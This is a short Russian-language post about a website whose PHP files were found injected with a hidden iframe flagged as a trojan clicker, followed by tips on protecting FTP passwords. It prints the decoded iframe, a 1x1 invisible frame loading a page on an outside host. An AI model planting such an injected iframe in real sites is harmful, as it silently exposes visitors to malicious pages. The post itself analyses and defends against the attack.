Трояшка.

Один знакомый прислал сцылку на свой сайт, где при загрузке на клиентской тачке антивирь стал постоянно ругаться на Trojan-Clicker.HTML.IFrame.l
Оказалось что таинственным образом в начале и в конце кода HTML, т.е. до тэга < html> и после < /html> появился код


Причём этот кусок текста был в куче .php файлов. Убрать-то я его отовсюду поубирал, но интересно стало откуда взялось и чё такое.

Перекодировав в нормальный вид получаем
[code]

< iframe src= 'http://setevik.org/fight_club/index.php' 
width=1 height=1 frameborder=0 hspace=0 
vspace=0scrolling=no marginwidth=0 marginheight=0 
allowtransparency=true>

[/code]

Полез на setevik.org, нету такой папки. Видать устарело :-)
Поискал в Яше, нашёл несколько интересных ссылочек, видать много народу с таким столкнулось. Народ сошёлся во мнении, (я тож так сразу подумал, так что знакомому посоветовал первым делом поменять пароль от фтп) что пароли были каким-то образом вытащены и применены. Или украдены напрямую у хостера, или ещё как-нибудь, способов хватает. На форуме Касперского кто-то сказал что пароли вероятно троян насобирал на той тачке откуда владелец сайта на свой фтп заходил.
Короче, мораль. Пароли от фтп в фаре или в тотале в открытом виде не хранить, и ваще их нигде не палить. Ещё нежелательно заходить на свой фтп из публичных мест - инет-кафе и всё остальное аналогичное, так как перехватить пароли не сложно. Особенно если этим занимаются админы сервака через который инет-кафе в инете сидит.
Советы, в общем-то, очевидные, но всё равно много народу про них забывает.